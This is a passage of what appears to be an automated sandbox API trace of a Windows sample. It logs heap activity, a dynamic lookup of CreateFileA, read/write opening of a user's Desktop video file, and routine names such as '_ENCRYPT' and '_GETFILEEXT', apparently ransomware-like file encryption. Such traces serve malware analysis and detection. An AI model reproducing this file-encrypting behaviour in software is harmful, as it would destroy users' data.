Size=0x10) returned 0x88c988 [0029.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0029.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0029.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0029.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0029.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0029.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.665] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0029.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8897c0 [0029.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8897c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0029.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.665] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0029.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0029.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897c0 [0029.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8897c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0029.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.666] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0029.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0029.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0029.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0029.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0029.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0029.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0029.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x35) returned 0x7c2080 [0029.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi", cchWideChar=53, lpMultiByteStr=0x7c2080, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi", lpUsedDefaultChar=0x0) returned 53 [0029.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0029.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.667] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aegtpts7bd.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0029.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0029.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0029.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0029.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0029.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0029.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0029.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=53, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0029.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6a) returned 0x7db300 [0029.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=53, lpWideCharStr=0x7db300, cchWideChar=53 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi") returned 53 [0029.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0029.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0029.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0029.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0029.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0029.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0029.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0029.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0029.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0029.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.668] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0029.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.669] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.669] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.669] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0029.669] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.670] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.670] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.670] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0029.670] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.670] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0029.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0029.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0029.671] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.671] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0029.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.671] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0029.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 